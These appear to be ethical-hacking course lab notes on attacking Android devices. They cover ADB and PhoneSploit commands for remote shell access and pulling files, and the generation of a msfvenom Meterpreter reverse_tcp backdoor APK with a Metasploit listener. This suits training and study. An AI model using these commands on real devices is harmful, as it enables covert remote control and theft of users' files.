17 - Hacking Mobile
Module 17 - Hacking Mobile Platforms
Download a file from Android device
ADB Tool
adb devices -l
# Connection Establish Steps
adb connect 192.168.0.4:5555
adb devices -l
adb shell
# Download a File from Android using ADB tool
adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt
adb pull sdcard/log.txt /home/mmurphy/Desktop
PhoneSploit
git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
#OR
python3 -m pip install colorama
python3 phonesploit.py
# Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device
# Type 4, to Access Shell on phone
pwd
ls
cd sdcard
ls
cd Download
#Download File using PhoneSploit
9. Pull Folders from Phone to PC
#Enter the Full Path of file to Download
sdcard/Download/secret.txt
Check entropy and hash of elf file using ADB Tool
#Perform deep scan of the elf files and obtain the last 4 digits of SHA 384 hash of the file with highest entropy value
adb connect 192.168.0.4:5555 # Connection Establish Steps
adb shell
#1. check elf file with highest entropy
ls sdcard/scan #check if there're .elf files
sudo adb pull /sdcard/scan #download entire dir including .elf files
ent -h #ent tool options, if we haven't it: apt install ent
ent first_file.elf #Entropy value 3.28412 bits, it has highest value of entropy.
ent second_file.elf #Entropy value 1.15679 bits
#2. check the last 4 digits of SHA 384
sha384sum --help
sha384sum first_file.elf
#select only the last 4 digits of hash.
Generating and Executing Payloads for Android
Setup Android
Open terminal, run
su
Run
ip addr add 10.10.10.69/24 dev eth0
Generate Payload
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk
R rawHost the payload and run a listener on Kali
Type
use exploit/multi/handler
Type
set payload android/meterpreter/reverse_tcp
Type
set LHOST 10.10.10.11
Start listener, type
exploit -j -z
Browse link of file to start meterpreter session.
Exploit Execution
Open kali hosted link.
Download APK using es file downloader.
Install and run.
Exploit the Android Platform through ADB using PhoneSploit
cd Phonesploit
python3 -m pip install colorama
python3 phonesploit.py
3
10.10.10.14
4
pwd
cd sdcard
cd Download
pwd
cd sdcard
cd downloads
cat accnt-info.txt
Last updated